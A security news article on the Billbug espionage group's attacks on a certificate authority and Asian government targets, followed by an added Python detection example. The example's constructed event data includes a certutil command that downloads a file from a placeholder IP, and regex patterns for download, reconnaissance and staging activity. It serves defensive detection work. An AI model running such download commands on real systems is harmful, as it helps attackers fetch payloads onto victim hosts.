As part of an ongoing effort that began no later than March 2022, a suspected Chinese state-sponsored actor compromised a digital certificate authority as well as government and defense organizations in several Asian nations. By identifying tools previously associated with this actor, Symantec, by Broadcom Software, attributed the attacks to a threat group it tracks under the name Billbug.
Although no data is believed to have been taken so far, espionage and data theft appear to be the driving motives behind the operation. The advanced persistent threat (APT) group Billbug, also known as Bronze Elgin, Lotus Blossom, Lotus Panda, Spring Dragon, and Thrip, is thought to operate in support of Chinese interests. Its main targets are military and government institutions in South East Asia.
The adversary used backdoors such as Hannotog and Sagerunex in its 2019 attacks, which were launched against Hong Kong, Malaysia, Indonesia, Macau, the Philippines, and Vietnam. Both implants are designed to provide persistent remote access to the target network, while in some cases the threat actor is also known to use an information stealer called Catchamas to exfiltrate sensitive data.
“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines,” Symantec researchers said. “It could also potentially use compromised certificates to intercept HTTPS traffic.”
However, the cybersecurity firm pointed out that there is no evidence that Billbug was able to compromise any digital certificates, and said it reported the activity to the affected certificate authority. Based on its analysis of the most recent wave of attacks, initial access is probably gained by exploiting internet-facing applications. The group then uses a combination of custom and off-the-shelf tools to achieve its operational objectives.
These include WinRAR, Ping, Traceroute, NBTscan, and Certutil, alongside a backdoor capable of downloading arbitrary files, gathering system information, and uploading encrypted data. Stowaway, an open-source multi-hop proxy tool, and Sagerunex, malware that is deployed via Hannotog, were also found to have been used in the attacks. The backdoor can additionally execute commands, deliver new payloads, and siphon off files of interest.
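The value of the tool list above for defenders is the combination: each of Certutil, NBTscan, Ping, Traceroute, and WinRAR is a legitimate utility, but one account chaining a download, network reconnaissance, and archive staging on the same host is worth investigating. The following Python snippet is an added example, not code from the Symantec report; the process-creation events, host names, and command lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed process-creation events: (host, account, command line).
# Illustrative only; not observed data from the report.
EVENTS = [
    ("ws-01", r"corp\alice", r"C:\Windows\System32\ping.exe -n 1 10.0.0.1"),
    ("srv-02", r"corp\svc_web",
     "certutil.exe -urlcache -split -f http://203.0.113.9/a.dat a.dat"),
    ("srv-02", r"corp\svc_web", "nbtscan.exe -r 10.0.0.0/24"),
    ("srv-02", r"corp\svc_web", r"WinRAR.exe a -hpSecret docs.rar C:\Users\Public\docs"),
    ("srv-02", r"corp\svc_web", "tracert.exe 10.0.1.5"),
    ("ws-03", r"corp\bob", "WinRAR.exe x report.rar"),
]

# Each pattern maps one of the article's tools to a tactic group.
PATTERNS = {
    "download": re.compile(r"\bcertutil(\.exe)?\s.*-urlcache", re.I),
    "recon": re.compile(r"\b(nbtscan|tracert|ping)(\.exe)?\s", re.I),
    "staging": re.compile(r"\bwinrar(\.exe)?\s+a\s", re.I),  # 'a' = add to archive
}


def classify(cmdline):
    """Return the set of tactic groups a single command line matches."""
    return {name for name, rx in PATTERNS.items() if rx.search(cmdline)}


def flag_hosts(events, min_tactics=2):
    """Return (host, account) pairs that chained tools from >= min_tactics groups.

    A lone ping or a WinRAR extraction is normal admin activity; the
    combination of download + recon + staging by one account is the signal.
    """
    seen = defaultdict(set)
    for host, account, cmd in events:
        seen[(host, account)] |= classify(cmd)
    return {key: sorted(tactics) for key, tactics in seen.items()
            if len(tactics) >= min_tactics}


if __name__ == "__main__":
    for (host, account), tactics in flag_hosts(EVENTS).items():
        print(f"{host} / {account}: {', '.join(tactics)}")
```

Tune the threshold and patterns to your environment; in real telemetry, pair the hit with the parent process and the account's normal role before escalating.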
The researchers concluded that the group remains a capable and well-resourced operator able to sustain long-running, wide-ranging campaigns, given that it compromised several victims at once. Billbug's reuse of tools previously associated with the group also suggests it is unconcerned about being linked to this activity.